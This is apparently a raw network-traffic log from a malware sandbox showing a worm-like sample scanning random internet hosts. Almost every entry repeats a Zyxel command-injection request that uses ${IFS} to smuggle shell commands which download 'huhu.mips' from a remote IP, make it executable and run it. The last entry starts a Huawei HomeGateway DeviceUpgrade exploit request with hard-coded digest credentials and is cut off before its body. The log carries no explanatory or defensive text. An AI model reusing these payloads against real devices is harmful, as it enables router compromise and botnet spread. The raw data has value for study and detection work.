                                                      Feb 2, 2024 06:36:06.938616037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7895192.168.2.144649061.92.210.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.938663006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7896192.168.2.143698018.177.70.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.938699961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7897192.168.2.145031068.7.161.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.938731909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7898192.168.2.144858889.62.101.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.938755035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7899192.168.2.144784071.172.93.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.938827991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7900192.168.2.1454648174.226.128.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.938858032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7901192.168.2.143487893.143.26.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.938905954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7902192.168.2.1436484105.8.90.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.938941002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7903192.168.2.1450300164.139.245.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.938971043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7904192.168.2.1454160191.140.206.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.939002037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7905192.168.2.146042217.125.165.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.939028978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7906192.168.2.1455622216.79.32.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.939071894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7907192.168.2.145269644.120.73.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.939124107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7908192.168.2.1457814152.245.66.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.939169884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7909192.168.2.146094277.10.155.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.939204931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7910192.168.2.1451196148.3.162.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.939246893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7911192.168.2.1434604108.36.141.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.939292908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7912192.168.2.1459662205.100.18.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.939338923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7913192.168.2.1436482129.197.162.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.939383984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7914192.168.2.14566204.101.246.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.939435005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7915192.168.2.1450664122.9.147.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.939472914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7916192.168.2.1459860206.251.252.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.939513922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7917192.168.2.143825450.214.3.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.939539909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7918192.168.2.1458466125.19.185.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.939604044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7919192.168.2.1446910200.60.132.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.939632893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7920192.168.2.143454087.42.138.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.939686060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7921192.168.2.1444856210.158.134.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.939717054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7922192.168.2.1435706145.14.63.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.939770937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7923192.168.2.144057427.222.196.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.939809084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7924192.168.2.1453350203.125.94.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.939847946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7925192.168.2.1444840165.225.9.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.939879894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7926192.168.2.1442466110.68.190.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.939919949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7927192.168.2.1448636116.36.6.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.939958096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7928192.168.2.1444418222.166.90.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.939990044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7929192.168.2.144404092.13.208.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.940032005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7930192.168.2.1439272222.37.163.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.940076113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7931192.168.2.1448498189.39.184.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.940134048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7932192.168.2.1458148125.74.177.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.940181017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7933192.168.2.1446248111.152.107.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.940208912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7934192.168.2.143412062.24.16.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.940258026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7935192.168.2.145235447.248.11.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.940294981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7936192.168.2.1455554219.90.112.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.940334082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7937192.168.2.1460798207.115.101.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.940373898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7938192.168.2.1455600165.142.253.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.940418005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7939192.168.2.1455050195.224.161.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.940463066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7940192.168.2.145589419.135.13.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.940496922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7941192.168.2.144347899.71.70.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.940530062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7942192.168.2.1460400136.191.153.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.940586090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7943192.168.2.1453406182.21.80.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.940627098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7944192.168.2.143650235.166.61.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.940670013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7945192.168.2.1440414129.226.87.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.940712929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7946192.168.2.1439726105.166.102.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.940740108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7947192.168.2.1460708140.116.191.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.940810919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7948192.168.2.144821043.103.5.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.940851927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7949192.168.2.145491812.139.220.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.940891981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7950192.168.2.1436014160.71.244.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.940905094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7951192.168.2.1459212183.207.56.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.940968037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7952192.168.2.143805417.71.51.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.941008091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7953192.168.2.1444184194.115.123.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:06.944719076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7954192.168.2.1452846168.220.93.5737215
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.741605043 CET841OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept: */*
                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                      Content-Length: 472
